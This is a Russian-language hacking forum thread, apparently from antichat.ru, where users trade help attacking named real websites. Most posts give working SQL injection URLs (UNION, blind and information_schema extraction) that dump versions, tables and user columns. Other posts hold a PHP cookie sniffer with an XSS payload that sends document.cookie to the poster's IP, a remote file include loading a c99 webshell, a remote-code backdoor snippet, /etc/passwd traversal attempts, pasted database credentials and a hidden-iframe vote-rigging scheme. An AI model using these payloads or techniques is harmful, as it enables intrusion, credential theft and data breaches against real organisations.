а насчёт aes_decrypt(aes_encrypt(version() ),0x71),0x71)

неканает!

попробуй тогда

unhex i hex

а второй тока в sql и ораклу умеет


А что тебе ещё надо?

а насчёт aes_decrypt(aes_encrypt(version() ),0x71),0x71)

неканает!


@@version?
Кинь ссылку, да и все..

2 R1dex
уже всё решили по аcьке там всё тривиально, просто до невозможного, но парень молодой у него всё получится...

2 R1dex
уже всё решили по аcьке там всё тривиально, просто до невозможного, но парень молодой у него всё получится...


да, огромное тебе спасибо!

Есть скрипт следующего содержания:

<?php
$base_url="";
require_once("func.php");
$l=db_connect();
$id_page=28;
echo_body($id_page);
require($base_url."inc/top2.inc.php");
//==
?>
<?php
//==
require($base_url."inc/bottom6.inc.php");?>

на сервере register_globals = On и mysql_quotes_gpc = Off

Могу ли я переопределить переменную $base_url ?

Пробовал так:

site.ru/script.php?base_url=../../../../../../../../../../../../etc/passwd%00

Но не сработало...

Могу ли я переопределить переменную $base_url ?

Как обычно умудрился внести путаницу даже в этот вопрос :)

Если это один скрипт, то нет не сможешь. Если это 2 разных файла то во втором сможешь

Тоесть тут
<?php
$base_url="";
require_once("func.php");
$l=db_connect();
$id_page=28;
echo_body($id_page);
require($base_url."inc/top2.inc.php");
//==
?>
Переменная определена
а тут нет
<?php
//==
require($base_url."inc/bottom6.inc.php");
?>
Если всё это в одном файле, то нет. Я просто зная твои вопросы не удивлюсь , если это 2 разных файла. :)
-------------------------------
2 it's mу ты или перепиши код в вопросе, или на словах объясни, что там у тебя на что заменяется. Твой код вообще работать не будет, и логика SQL запроса тоже не вполне понятна

В одном файле.Но разные скрипты.Какая разница,определена переменная или нет.если регистр глобалс есть,а значит я могу переопределить любую переменную.Разве не так ?)Во всех файлах такая же фигня =_=

Велемир :/ , определить можно только неопределенные переменные, в этом суть.

В твоем случае

$base_url="";

Она определена уже (я про первый скрипт, во втором - нет). Но это я повторяю то что сказал jokester... Перечитай статьи о ргистер глобалс

Как обойти фильтрацию? если даже скобки фильтруются(( плз ктото кто шарит в пхп иньекциях дайте асю) поделитись знаниями)

S[N]EP без линка сейчас начнутся нелепые домыслы на 5 страниц
И вобще по твоему вопросу не вполне понятно о какой инъекции идёт речь то-ли скуль, то-ли пхп

PS И ещё момент, а зачем скобки? :)

вот ссылка http://reg.la2titan.ru/index.php?act=fuck
Мне кажется что это пхп Иньёкция)
но там фильтруюца точки и другие символы.... Читал на ачате что это можно обойти через base64 но там нада скобки использовать для раскодировки тут они тоже запрещены вот я и незнаю что делать)

S[N]EP
Ничего там ,видимо, не получится, регулярка пропускает только буквы и цифры. Тоесть только расскрытие пути

а можеш плз в целом глянуть может ищё чтото есть? я вроде не нахожу? а что за раскрытие путей

а можеш плз в целом глянуть может ищё чтото есть?
нету там больше ничего (на этом поддомене), да и инклуд там не проведешь..

а что за раскрытие путей
диры, до сайта, на срве хостера

S[N]EP
Эта тема называется "Ваши вопросы по уязвимостям" сдесь задаются вопросы по уязвимостям, правила в первом посте.

Если нужна помощь со взломом тебе сюда:
https://forum.antichat.ru/forum44.html
(но сомневаюсь, что будет польза)

Если готов заплатить то сюда:
https://forum.antichat.ru/forum57.html
(а вот тут скорее всего польза будет, если будет адекватная цена)

На сим оффтоп прекращаем

а какими способами вообще можно узнать логин и пасс от БД
???

А где можно спросить что значат различные ошибки?
например:
Notice: Undefined index: controller in /www/la2tit01/www/htdocs/cake/dispatcher.php on line 168

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /www/la2tit01/www/htdocs/cake/dispatcher.php:168) in /www/la2tit01/www/htdocs/cake/libs/session.php on line 146

Warning: Cannot modify header information - headers already sent by (output started at /www/la2tit01/www/htdocs/cake/dispatcher.php:168) in /www/la2tit01/www/htdocs/cake/libs/session.php on line 147

EP']а какими способами вообще можно узнать логин и пасс от БД
???
Попробуй начать вот с этого
http://forum.antichat.ru/thread43966.html

А где можно спросить что значат различные ошибки?
можно на русский перевести, и все =\

Попробуй начать вот с этого
скорее с этого - google.ru

Уххх,пасибо ребятишки.До меня быстрее доходит,когда кто-то нормальным человеческим языком объясняет: )))))))))Лавите плюсеги!))

http://www.*********.ru/index.php?id=23665+and+1=0+union+select+1,2,3,4,5, 6,7,8,9,0,11,12,13,14,15,16,17,18,19,00,21,23,23--

jokester я не могу сказать какой точно код, так как не вижу его, но могу рассказать тебе историю:

Есть код, допустим он выглядит следующем образом:
<?
// Начало скрипта
...
// Скрипт получает переменную из формы, допустим <input name="pass" type="password">
$pass = $_POST['pass'];

// Здесь идет проверка/заменна символов у переменной $pass, допустим определим проверку функцией:
function ReRe($re) {
$re = preg_replace("/'/", "\\", $re);
$re = preg_replace("/\"/", "\\", $re);
$re = preg_replace("/</", "", $re);
$re = preg_replace("/>/", "", $re);
$re = preg_replace("/\//", "", $re);
$re = preg_replace("/:/", "", $re);
$re = preg_replace("/\./", "", $re);

return $re;
}

// Дальше скрипт выполняет запрос к БД, и вот его у меня нету
...
// Конец скрипта
?>
Если смотреть по выдачи ошибки MySQL, то получается следующее:
SELECT * FROM passwords where (pwd = '$pass' or pwd = '$pass' or pwd = '$pass') and dateend>='1235374244'Т.е. если в поле вставить допустим ' (апостроф), то скрипт выдает следующую ошибку:
MySQL Error!
------------------------

The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' or pwd = '\') and dateend>='1235374381'' at line 1

Error Number:
1064
SELECT * FROM passwords where (pwd = '\' or pwd = '\' or pwd = '\') and dateend>='1235374381'Я в растерянности даже не знаю, что сделать, от безысходности даже пытался апостроф заменить на &apos (теоретически прокатывает) и запрос типа: pass&apos) or 1=1#' принимает радостный вид:
SELECT * FROM passwords where (pwd = 'pass') or 1=1#\' or pwd = 'pass')' or pwd = 'pass') ') and dateend>='1235374814'Но глаз режет информация о синтаксической ошибке:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'pass')' or pwd = 'pass') ') and dateend>='1235374941'' at line 1 Вот такая вот печальная история с трагическим концом. :( Как думаете дети, в чем автор допустил ошибку?

Как думаете дети, в чем автор допустил ошибку?
Я хоть и не детя но ответ очевиден - в то что не закрыл остальной запрос, например:
pass&apos) or 1=1+--+

Вообще-то символ # обозначает комментарий до конца строки в MySQL, а мой запрос в прошлом посте был вида: pass&apos) or 1=1#'

У меня при запросе, напр
-1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
вылазит ошибка


Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'.

/html/leftbar-categories.asp, line 12
замена "+" на пробел или /**/ не помогла

Вообще-то символ # обозначает комментарий до конца строки в MySQL, а мой запрос в прошлом посте был вида: pass&apos) or 1=1#'
Вообще-то символ # прокатывает далеко не везде, а вообще что бы ни заниматься гаданием не плохо бы линк в студию.

я думаю привел достаточно информации, так что думаю можно обойтись без линка :(

У меня при запросе, напр

вылазит ошибка

замена "+" на пробел или /**/ не помогла

Линк в студию.

Линк в студию.
Не хачу :) т.к. сайт оч крутойи если скажу скорее всего прикроют

http://www.etoya.ru/search/?text=lol')+group+by+26/*

нук у кого получится раскрутить что то у меня не получается

it's mу не знаю какому чудо программеру потребовалось написать такой код, но пусть это останится на его совести:
(pwd = '$pass' or pwd = '$pass' or pwd = '$pass')
Опять-же функцию ты написал от фонаря, и единственное, что извесно точно, это этот чудесный запрос, и то, что ковычка заменяется на "\"(это по ошибкам мускула)

При таком раскладе ты ничего не сделаешь т.к. ковычку необходимую для закрытия ты не получишь.

НО ! Т.к функция замены символов тобою выдумана, и достоверно мы не знаем, что там за код, могут быть варианты.

Ну и конечно, если всё-же в чудо запросе участвует ещё одна переменная, и тогда тоже есть варианты например так:
(user_password='$pass' or user_name='$name')
pass='&name=)+or+1=1/*
И тогда проходим авторизацию
(user_password='\' or user_name=')+or+1=1/*')
Но это ,я думаю, ты и сам понимаешь

И кстати, насчёт # AkyHa_MaTaTa прав, тогда уж %23
=====================

нук у кого получится раскрутить что то у меня не получается
Нук, почитай статьи , и на запрос внимательно посмотри, он весь в ошибке.
http://www.etoya.ru/search/?text=-11')+group+by+1+union+select+1,2,3,4,version(),6,7 ,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27/*

jokester там нет второй переменной, исходя из твоего поста и моих соображений, то навряд-ли что-то можно сделать в данной ситуации :( на счет функции ReRe её я сделал что бы показать какие символы на что меняются, т.е. логически исходя из моего поста, в твой запрос pass='&name=)+or+1=1/* неверен, ни по символам, ни по ситуации, так как переменная одна. Для просящих все таки выложу ссылочку, может быть кто-то умнее меня :( miniubka.cc/pay1.php?partner=2&video=index.php

у меня сайт не пингуется, но если передать переменной значение вида ) or 1=1#', должен получится верный запрос (прошу проверить):
SELECT * FROM passwords where (pwd = ') or 1=1#\' or pwd = ') or 1=1#\') or pwd = ' or 1=1#\') and dateend>='1235374381'

/add
и достоверно мы не знаем, что там за код, могут быть варианты.
имхо в запрос попадает &apos (в html &apos а при просмотре ')

/add2
Shadow6120, линк в студию/пм

l1ght Бинго, вы перешли на второй уровень :D
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') or 1=1#\'' at line 1
SELECT * FROM partner_access where partner='2' and pwd=') or 1=1#\'

Есть сайт на асп(судя по всему MSSQL ;) ), ощибки базы данных не выводятся... но есть слепая инъекция, как я думаю.

script.asp?id=853 - контент показывается

script.asp?id=853' - контент не показывается

script.asp?id=853+order+by+8-- - подобрал колонки, их восемь.

script.asp?id=853+union+select+null,null,null,null ,null,null,null,null-- ничего не выводиться, в том числе контент.

Как быть с этим? Подбирать тип колонок вручную? или что то еще можно?
И вообще, правильно ли я рассуждал?

у меня сайт не пингуется, но если передать переменной значение вида ) or 1=1#', должен получится верный запрос (прошу проверить):


/add

имхо в запрос попадает &apos (в html &apos а при просмотре ')
Дело в том что выше постами было установлено, что апостроф фильтруется, а как я говорил &apos; это сделано для того, что бы красиво было глазам смотреть на "удавшийся" инъект. Вообще спасибо тебе за помощь, но ничего сделать нельзя так как апостроф нужно в любом случаю, что бы удовлетворить логику запроса :(

непонятная скуля.. да еще и сайт не быстр принайме у меня..
http://www.whimit.com/forum_read.php?f=17э&id=75739'
а как у вас? )

http://www.whimit.com/forum_read.php?f=17
Invalid query: db_query - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'and g.id=gb.id order by g.id' at line 1

А больше хрен че добьешся... Все фильтрует че только можно даже group by или внатуре фиг поймешь..

__www.dpstyle.com.ua
не могу найти файл, чтобы править данные вмида на свои. Уже всё перерыл. Где они вообще могут быть?

Нужен php-скрипт для удобной работы с базой оракл через веб-интерфейс. Т.е. что-то вроде rst-sql.php или phpmyadmin, но для Oracle.

budden, этот вопрос не для раздела уязвимости!

вообще сайт бажный какой-то

1. Там с нормальными параметрами не работает:

http://www.whimit.com/forum_read.php?f=17&id=75739

2. http://www.whimit.com/album_list.php?username=inmate051877lol

__www.dpstyle.com.ua
не могу найти файл, чтобы править данные вмида на свои. Уже всё перерыл.
В админке смотрел? ;)

Где они вообще могут быть?
В БД


Нужен php-скрипт для удобной работы с базой оракл через веб-интерфейс. Т.е. что-то вроде rst-sql.php или phpmyadmin, но для Oracle
phpOracleAdmin - ищи в гугле ;)

http://lit.1september.ru/urok/index.php?SubjectID=100010'

Помогите, вроде скуля, а не крутится...

2 wildshaman


http://lit.1september.ru/urok/index.php?SubjectID=100010+AND+ASCII(SUBSTRING((se lect+user()),18,1))=x


я нашел слепухy

Version : 5.1.30-log
Database : dblit
User : webuser@localhost

2 wildshaman


http://lit.1september.ru/urok/index.php?SubjectID=100010+AND+ASCII(SUBSTRING((se lect+user()),18,1))=x


я нашел слепухy

Version : 5.1.30-log
Database : dblit
User : webuser@localhost

Респект)
А как версию, юзера и Дб вытянул?

запрос перед тобой, вместо х ставь циферки Асчий... и читай про блинд скули

запрос перед тобой, вместо х ставь циферки Асчий... и читай про блинд скули

О, спс, про блинды не читал...

http://www.dnastar.com/support/FAQs1.php?faqid=-1

Не могу вытащить юзеров и пароли ихнее
а точнее вытащил из таблицы user
колонку username токо =\
дальше чет не могу так как все там перерыл

diznt, там при логине не пароль просят, а какой-то номер (Subscriber Number)

http://www.dnastar.com/support/FAQs1.php?faqid=-10+union+select+1,2,group_concat(column_name,0x2F, table_name),4,5,6+from+information_schema.columns+ where+column_name+like+'%num%'/*

ssnum/forms

может что-то из этого .. проверь на всякий случай.




2sabe

http://www.whimit.com/forum_read.php?f=17&id=75739+and+substring(version(),1,1)=4

версия 4.0. Подзапросов нет .. поковыряю еще насчет юниона

в таблице user такие колонки там


dnastar:user:LEADNUM
dnastar:user:FIRSTNAME
dnastar:user:LASTNAME
dnastar:user:INSTIT
dnastar:user:PHONE
dnastar:user:EMAIL
dnastar:user:NO_WEB_PRC
dnastar:user:EXEMPT
dnastar:user:datelogged
dnastar:user:username
dnastar:user:sp
dnastar:user:web_role

http://www.citycollege.ac.cy/link.php?id=-211+union+select+1,2,3/* вроде инъекция... Но не выводит. Прошу помочь.

http://www.citycollege.ac.cy/link.php?id=-1+union+select+222,version(),1/*

http://www.citycollege.ac.cy/link.php?id=-211+union+select+1,concat_ws(0x3a,user(),version() ,database()),user()--

http://amxbans.snakearena.net/ban_details.php?bid=-1+union+select+1,2,3,4,5,6
вроде как инъекция, но ничего не выводит...

https://forum.antichat.ru/showpost.php?p=1108085&postcount=2
https://forum.antichat.ru/showpost.php?p=1108479&postcount=3

подскажите мне! у меня в сети есть сервак! через который сеть выходит в инет! на нем есть сайт статистики,вот я там полазил и нашёл такую штуку-в периоде с ...... по ..... если ставишь > то после поля даты появляется name=date_end> , а во втором окне если так же сделать,то будет name=date_beg>, а если поставить ' в самом поле периода вместо даты появляется вот так \' Так же доступно phpinfo.php
Что я могу тут сделать? я в php не оч шарю.И еще скажи мне если я через этот локальный сайт статистики ввожу карточку(которую покупаю для инета) он мне зачисляет на мой аккаунт деньги не выходя в нет! я вот думаю-значит бд карточек на серваке находится? или там другая система?

похоже на XSS. Вообще по такому описанию сказачть оч сложно. или давай ссылку(!!!!!) или расписывай подробнее.

пробую эту фишку - http://forum.antichat.ru/showpost.php?p=663815&postcount=2
скуля, 8 полей,во второе вттыкаю кавычку в хексе,вылазает ошибка,пробую подобрать во втором запросе колонки,ниче не получаеццо ( скрипт прочитал бажный, вот код, должна ли тут работать эта фишка или меня глючит?

<?php

// Libraries
include '../php-bin/PageFunctions.php';
include '../php-bin/lib/querylib.php';

$nid = @$_GET['nid'];
$category = @$_GET['category'];

// If no nid, exit
if ($nid == "")
{
echo("Error: no article ID");
exit;
}

// Create a PageFunctions object
$objPFunc = new PageFunctions();

$query = new Query('localhost', 'root', '4dm1n777', "www");

// Year hash
$tmonth = array();
$tmonth['1'] = "January";
$tmonth['2'] = "February";
$tmonth['3'] = "March";
$tmonth['4'] = "April";
$tmonth['5'] = "May";
$tmonth['6'] = "June";
$tmonth['7'] = "July";
$tmonth['8'] = "August";
$tmonth['9'] = "September";
$tmonth['10'] = "October";
$tmonth['11'] = "November";
$tmonth['12'] = "December";

$getitem = $query->SQL("select * from newsitem where nid = " . $nid . " limit 1");
$item = mysql_fetch_assoc($getitem);

$gettext = $query->SQL("select * from newstext where nid = " . $nid . " limit 1");
$text = mysql_fetch_assoc($gettext);

$getcat = $query->SQL("select ctitle from newscategory where cid = " . $item['cid'] . " limit 1");
$cattext = mysql_fetch_assoc($getcat);

$query->Disconnect();

?>

add: бажный параметр - nid

подскажите мне! у меня в сети есть сервак! через который сеть выходит в инет! на нем есть сайт статистики,вот я там полазил и нашёл такую штуку-в периоде с ...... по ..... если ставишь > то после поля даты появляется name=date_end> , а во втором окне если так же сделать,то будет name=date_beg>, а если поставить ' в самом поле периода вместо даты появляется вот так \' Так же доступно phpinfo.php
Что я могу тут сделать? я в php не оч шарю.И еще скажи мне если я через этот локальный сайт статистики ввожу карточку(которую покупаю для инета) он мне зачисляет на мой аккаунт деньги не выходя в нет! я вот думаю-значит бд карточек на серваке находится? или там другая система?

вот сделал скрин- http://pic.rapidshare.ru/941552 оригинала и что получается

Napas

А зачем ты подбираешь количество колонок, когда там без вариантов одна колонка?

2 cr0w
хмм, всмысле во внутреннем запросе?
так должен прокатить трюк со внутренним запросом или нет? и если да,как его реализовать,а то чет у меня мозгов не хватает :(

http://molod.karelia.ru/portal/page/portal/molod/main/kur?art=5' Скуль или нет?

2Assembler
http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=2+and+1=1+--+
вот скуль)) blind))

http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+1,2,3,4,5,6,7,8,9,0,1+from+news+--+
The Error is: java.sql.SQLException: ORA-01790: выражение должно иметь тот же тип данных, что и соответствующее выражение

http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+null,null,null,null,null,null,null, null,null,null,null+from+news+--+

а вот и все таблички
http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+table_name,null,null,null,null,null ,null,null,null,null,null+from+sys.user_tables+--+

скажите пожалуйста как найти админку в ipb <=2.3.5 если она не по дефолту admin =(
чем поперебирать или где найти?

Обычно когда логинешься под админом акком, просто на форуме в смысле, то пояляеться линк на админку, ну или брут скриптом.

AkyHa_MaTaTa, залогинился, нет ссылки =(

https://forum.antichat.ru/showpost.php?p=1064972&postcount=593

подскажите программы-сканеры (или ветку где обсуждалось и заливалось) для sql иньекций.. для полуавтоматической подстановки полей ... и т.д. типа SIPT 4
спасиба

2 svalck http://forum.antichat.ru/thread24918-SIPT.html

Pashkela, ничего толкового не нашел, я думал есть способ проще =((

2svalck
а чтоб проще и понятнее тока самому написать)

так че мне никто не подскажет как убрать ограничитель символов и че еще могу сделать?

а вот и все таблички
http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+table_name,null,null,null,null,null ,null,null,null,null,null+from+sys.user_tables+--+
Хочется узнать че это за бд,такая и где можно почитать про.. И каким макаром узнать калонки в таблице JFORUM_USERs

2Assembler
http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+1,2,3,4,5,6,7,8,9,0,1+from+news+--+
Цитата:
The Error is: java.sql.SQLException: ORA-01790: выражение должно иметь тот же тип данных, что и соответствующее выражение


ORA-01790: - база данных оракл.тут была статья от [x53]Shadow про проведение инжекта в оракл

а точнее здесь:
https://forum.antichat.ru/thread40576.html

htt p://cardz.ru/index.php?rasd=oplata&type=1'
Можете посмотреть эту скуля или нет , а то не могу понять!

Sosok, нет, не скуля.
при скуле будет немного другая ошибка.

Sosok, это ошибка в самом скрипте, она не вызвана кавычкой...
http://cardz.ru/index.php?rasd=oplata&type=1
=
http://cardz.ru/index.php?rasd=oplata&type=1'

Начёт сниффера.Код взял с форума:

<?php


$date = date('d.m.y - H:i:s');
$ip = UrlDecode(getenv('REMOTE_ADDR'));
$referer = UrlDecode(getenv('HTTP_REFERER'));
$query = UrlDecode(getenv('QUERY_STRING'));
$cookie=getenv('HTTP_COOKIE');

$s = fopen("C:\Program Files\VertrigoServ\www\cookies.txt","w");

if($s) {

echo "Successfully opened!";
fputs($s,$cookie);
echo "\n";
fputs($s,$ip);

}

else {

echo "У нас праблемы...";

}


?>

Также есть XSS на одном сайте.Как нужно обратиться к скрипту,чтобы он записал данные ?

"<script%0A%0D>s=new Image();s.src="http://my_ip/sniffer.php?"+document.cookie%3B</script>

Где my_ip - мой Ip адрес).На серве лежит скрипт sniffer.php. В фаил ничего не записалось,вот я и подумал,что обращаюсь к скрипту неправильно.

при составлении запроса в mssql inj приходится сначала кодировать в чар а потом с помощью урл код)) естественно чтоб узнать все таблы запрос будет длинным.. и обрезается(( как поступить?

кто знает где пассы клиентов в cPanel .. или каждый хостер делает свое?

при составлении запроса в mssql inj приходится сначала кодировать в чар а потом с помощью урл код)) естественно чтоб узнать все таблы запрос будет длинным.. и обрезается(( как поступить?
SELECT TOP 1 TABLE_NAME FROM inofrmation_schema.TABLES WHERE TABLE_NAME NOT IN(SELECT TOP x++ TABLE_NAME FROM inofrmation_schema.TABLES ORDER BY TABLE_NAME) ORDER BY TABLE_NAME

2razor
работает) но как можно по аналогии вытащить имена колонок?)
(SELECT TOP 1 column_NAME FROM information_schema.columns WHERE table_name='tbllogin' and column_NAME NOT IN(SELECT TOP 3 column_NAME FROM information_schema.columns ORDER BY column_NAME) ORDER BY column_NAME)
и если выводит данные из таблицы ... where id=2... почему запрос проходит без ошибок? или какие еще способы есть сдампить удаленно?

Можно ли как-то раскрутить пхпинклюд http://volkswagen.msk.ru/?p=../../../../../../../../../../etc/passwd%00 ? Стандартные методы не работают))

а как такой роскрутить?
http://shop.zano.ru/index.php?act=13 order by 1

а как такой роскрутить?
http://shop.zano.ru/index.php?act=13 order by 1
ошибку видишь?

Warning: include() [function.include]: Failed opening '13-1.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/host700852/zano.ru/htdocs/shop/index.php on line 204 :)

http://shop.zano.ru/index.php?act=http://mail.ru/?

ыы

http://shop.zano.ru/index.php?act=http://wowbkdo.narod.ru/c99madshell =)))

2razor
работает) но как можно по аналогии вытащить имена колонок?)

SELECT TOP 1 COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='tbl' AND COLUMN_NAME NOT IN(SELECT TOP x COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='tbl' ORDER BY COLUMN_NAME) ORDER BY COLUMN_NAME

Всем здрасти
При подборе колонок выводиться

Mixing of GROUP columns (MIN(),MAX(),COUNT(),...)

Перебрал 20 колонок все так же
URL:

http://frutonyanya.ru/php/news.php?c=1'

:D

Pashkela в своём духе =) if(isset($_GET['cmd'])){$f=require("http://pashkela.narod.ru/tema1.txt");die($f);} Файлик -абревиатура от вебмани :)

diznt, там же ясно пишет. Запрещен микс груп бай и других параметров, кроме мин, макс, каунт...

2 diznt

blind sql injection

version: 4.1.22-log
database : frutony3_fn
user : frutony3_fn@localhost



http://frutonyanya.ru/php/news.php?n=25&c=49+AND+ASCII(SUBSTRING((select+user()),1,1))>x

Всем здрасти
При подборе колонок выводиться

Mixing of GROUP columns (MIN(),MAX(),COUNT(),...)

Перебрал 20 колонок все так же
URL:

http://frutonyanya.ru/php/news.php?c=1'

:D
https://forum.antichat.ru/showpost.php?p=966458&postcount=3908
советую забить на скулю доступа к information_schema нет
http://frutonyanya.ru/php/news.php?c=77+group+by+'cc'+and+(select+1+from+inf ormation_schema.tables)--
//add а ну да не обратил внимания на ветку=) 4.1

Где можно почитать о блинд скуль инъекциях?

[MySQL/SQL-inj]

SQL injection полный FAQ (https://forum.antichat.ru/threadnav43966-1-10.html)
Там же скрипты для вывода всех записей из таблицы, брута имен столбцов и полей.

SQL injection полный FAQ: системные переменные (https://forum.antichat.ru/showpost.php?p=474247&postcount=17)
SQL injection полный FAQ: прелести двойного запроса (https://forum.antichat.ru/showpost.php?p=663815&postcount=39)
Вообще очень и очень полезная вещь, прошу особенно обратить внимание на неё - случаи когда права на файлы у пользователя БД есть, но кавычки экранируются более чем частые.
И как показывает практика найти, читая сорцы найти, уязвимый запрос, данные из которого подставляются в другой запрос, более чем реально, а результат шелл.
Так же имейте ввиду что иногда, данные из запроса подставляются в функции include() или eval() - тут надо следить за выводом ошибок при SQL инъекции.

Новая SQL Injection Tool 4 (https://forum.antichat.ru/threadnav24918-1-10.html)

SQL инъекция (в т.ч. и blind SQL) (https://forum.antichat.ru/thread19844.html)
SQL инъекция (в т.ч. и blind SQL): Работа с инъекциями в MySQL третьей версии. (https://forum.antichat.ru/showpost.php?p=565034&postcount=4)
SQL инъекция (в т.ч. и blind SQL): Скрипт для работы со слепыми инъекциями. (https://forum.antichat.ru/showpost.php?p=894169&postcount=5)
Там же можно найти словари для брута имён таблиц и колонок, а вот и ещё:

SQL databases (https://forum.antichat.ru/threadnav73003-1-10.html)
[antichat] sql4 dictionary (https://forum.antichat.ru/thread93547.html)
Имена таблиц (https://forum.antichat.ru/threadnav45790-1-10.html)

Новая альтернатива Benchmark'y или эффективный blind SQL-injection (https://forum.antichat.ru/thread35207.html)
Справочное руководство по MySQL (http://www.php.su/mysql/manual/)
Мануалы с офф сайта (English), по версиям: 3.23, 4.0, 4.1 (http://dev.mysql.com/doc/refman/4.1/en/index.html) 5.0 (http://dev.mysql.com/doc/refman/5.0/en/index.html) 5.1 (http://dev.mysql.com/doc/refman/5.1/en/index.html) 6.0 (http://dev.mysql.com/doc/refman/6.0/en/index.html)

by Grey

http://arainia.com/software/gizmo/overview.php?nID=4
Как эту расскрутить... Остановился на 20 столбцах, пишет что мало...

2 mailbrush
по мне , так опять блинд


Version : 4.1.22-standard
Database : arainia_members
User : arainia_members@localhost



http://arainia.com/software/gizmo/overview.php?nID=4 AND ASCII(SUBSTRING((select+user() ),1,1))=x/

Gorev, эм.. где там вывод?
http://www.eu-gateway.eu/go.php?nID=-9+and+1=0+union+select+1,2,3,4,5
фух, а это что? тут не выводит

2 mailbrush

вывода тм нет, на то она и есть слепая скуля что вывода нет.
http://www.eu-gateway.eu/go.php?nID=-9' тоже слепуха, читай про блинды

Только что прочитал... Вроде подставил, но всеравно та же ошибка - Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource. Подставлял: http://www.eu-gateway.eu/go.php?nID=-9+OR+nID=IF(ASCII(SUBSTRING((SELECT+USER()),1,1)=2 54,1,0)Что не так?

http://www.eu-gateway.eu/go.php?nID=2+and+1=if(substring((select+version()) ,3,1)=0,1,(select+1+union+select+2))/*
версия 4.1

http://arainia.com/software/gizmo/overview.php?nID=4
Как эту расскрутить... Остановился на 20 столбцах, пишет что мало...

http://arainia.com/software/gizmo/overview.php?nID=-4+union+select+version(),2,3--

Вывод в исходной.

http://www.tv3russia.ru/mysticism/programs/programs_310/foto/photo.php?id4[]=1329

Вроде бы и скуля... а вроде и нет... подскажите)

http://www.tv3russia.ru/mysticism/programs/programs_310/foto/photo.php?id4[]=1329

Вроде бы и скуля... а вроде и нет... подскажите)
Нет.

Нет.

Хм, а почему тогда SQL error

Error 1064, 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1'

Походу когда делаешь массивом проходится проверка на пустое значения, ну а потом например идет int() от масива даст '' и в гверю идет пустое значения, возможно.

Это ошибка скул запроса. id4=1329 определяет переменную id4 и присваивает ей значение. id4[]=1329 определяет массив id4[0]=1329. Далее идет запрос примерно такой
select count(*) as CNT from VOICES_TO_PHOTO where CLIENT_ID='ip' and PHOTO_ID=id4

в первом случае это возвращает правильный результат. Во втором случае подставляется массив и вызывается ошибка.

Это ошибка скул запроса. id4=1329 определяет переменную id4 и присваивает ей значение. id4[]=1329 определяет массив id4[0]=1329. Далее идет запрос примерно такой
select count(*) as CNT from VOICES_TO_PHOTO where CLIENT_ID='ip' and PHOTO_ID=id4

в первом случае это возвращает правильный результат. Во втором случае подставляется массив и вызывается ошибка.

ну вот, таки скуля) Раскрутить ее можно?

не скуля)
переменная id4 хорошо фильтруется. Тут фишка в том, что при id4[]=1329 в запрос идёт строка 'Array' и значение 1329 записывается в переменную id4[0].

Можно ли пролистать другой диск-драйв через подобие командной строки командой dir? К примеру программа находитцо в папке C:\samas\sam2\, значит к корню: "dir ./../../../ /". Использование: "dir {путь} {тип поиска}". Тупое прописывание буквы диска не проканает, можно использовать только короткие имена (6n~1).
Не уверен что это возможно, но мало ли кто дельное предложит. :)

http://forum.antichat.ru/showpost.php?p=1146967&postcount=8135Вот... Все выводит, кроме колонок id
active
login
password
title
email
phone
reg_time
description ищ таблы юзер... Почему?

http://www.nostalgiatv.ru/418/?id=1287+order+by+5+--
Подал число. При попытке сделать http://www.nostalgiatv.ru/418/?id=-1+uion+select+1,2,3,4,5+--
пишет 33Ошибка выполнения запроса на сервере =(
Что не так?

Нужен скриптик на пхп
Чтобы когда зашол на страницу то заметно заливался шелл на сайт
путь до сайта знаю

Ни как не могу реализировать подбор:
_http://www.granadocafe.com/index.php?option=com_fireboard&Itemid=209'

2 wildshaman
слепая
http://www.nostalgiatv.ru/418/?id=22+and+ascii(lower(substring((version()),1,1)) )=52--+
4 версия
на слово "select" походу фильтр идет ;/

Ни как не могу реализировать подбор:
_http://www.granadocafe.com/index.php?option=com_fireboard&Itemid=209'

это форум ... ты ничего не сможешь там сделать

ну и что, что форум... скуль же есть

ну и что, что форум... скуль же есть
Та слешируються кавычки а без кавычки ты нифига не сделаешь

Может быть это не совсем по теме, но новый топик создавать не хочется, дабы не засорять форум пустяковым вопросом ламера.

Так вот. На определённом сайтике есть опрос, где нужно "продвинуть" один из вариантов ответа. Так как голосовать на сайте можно из инета (всмысле из всего инета, а не из сетки), но так как с одного адреса (скорее всего IP) многоразовое голосование блокируется, то идея вобщем баяновская: создать страничку в сети не по теме, где во фрейме нулевого размера шла бы переадресация на этот опрос с нужным вариантом ответа (типа чел там ответил). Но вот проблема заключается в том, что я не знаю как этот вариант ответа передаётся. Как это можно выяснить?

firefox - tamper data,http fox, и множество сниферов, выберай сам, но имхо легче и быстрее через прокси крутить.

Можно сформировать просто страничку которая будет передовать пораметры голосования POST или GET, ты можешь это посмотреть на форме голосования какая переменная передаются какому скрипту и каким методом, а потом на сформированую страничку просто лей трафик и всё...

Может быть это не совсем по теме, но новый топик создавать не хочется, дабы не засорять форум пустяковым вопросом ламера.

